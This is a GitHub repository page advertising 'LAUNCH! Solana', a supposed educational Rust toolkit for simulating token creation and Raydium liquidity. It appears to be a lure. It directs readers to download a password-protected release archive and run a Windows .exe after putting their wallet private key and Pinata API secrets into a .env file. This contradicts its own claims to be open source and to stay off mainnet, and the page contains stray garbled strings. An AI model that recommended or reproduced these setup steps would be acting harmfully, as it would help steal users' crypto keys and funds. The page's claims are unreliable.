Skip to content

an all-in-one toolkit for experimenting with custom assets and configurations on the **Solana blockchain**. It includes logic for configuring token parameters, simulating liquidity setups (e.g., with **Raydium**) and minimal overhead. Built in **Rust**, provided as a single native application for testing and educational use.

License

Notifications You must be signed in to change notification settings

lacydebuger/launch-solana-token

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🚀 LAUNCH! Solana - Comprehensive Toolkit

аываыв

LAUNCH! Solana is an all-in-one toolkit for experimenting with custom assets and configurations on the Solana blockchain. It includes logic for configuring token parameters, simulating liquidity setups (e.g., with Raydium) and minimal overhead. Built in Rust, provided as a single native application for testing and educational use.

🛠 How to Get Started

Download the latest build from the Releases page.

⚠️ the archive password is SOL!launch

  • Unzip the archive

  • Open the .env file and fill DEV_KEYPAIR, PINATA_API_KEY, PINATA_SECRET_API_LEY.

    *DEV_KEYPAIR is your private key; pinata api you can grab from here.

  • Launch the .exe file.

If you dont fill on the .env file, the software will not work!

dwdwdмени-1

✨ Features Overview

  • Asset configuration support

    • Define name, symbol, description, visual reference, and social metadata
    • Configure supply, decimals, and ownership settings
  • Built-in fee simulation

    • Estimate network fees and convert values for reference (SOL ↔ USDT)
    • Manage permissions (freeze, mint, update) for testing decentralization options
  • Liquidity simulation

    • Emulate pair setup on Raydium-like environments (e.g., SPMM / v4)
    • Include mock liquidity scenarios
  • Permission-oriented logic

    • No direct on-chain interaction unless exported
    • Simulate decentralization paths based on user-defined rules

Free and open-source testing tool for exploring token configurations on Solana.

🔋 Technical Stack

  • Language: Rust
  • Build: Native .exe (Windows)
  • Dependencies: solana-program, spl-token, raydium-amm-v4

📚 Documentation

Tutorials and walk-throughs will be published in the Wiki section soon.

📌 Notice

This tool is intended strictly for educational and experimental use. It does not interact with mainnet or deploy live assets. Use responsibly.

Summary of Capabilities

  • Name, symbol, and description input
  • Decimal customization
  • Asset preview before and after simulated creation
  • Logo reference via image URL
  • Creator details and external links
  • Metadata (e.g., website/social handles) simulation

About

an all-in-one toolkit for experimenting with custom assets and configurations on the **Solana blockchain**. It includes logic for configuring token parameters, simulating liquidity setups (e.g., with **Raydium**) and minimal overhead. Built in **Rust**, provided as a single native application for testing and educational use.

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages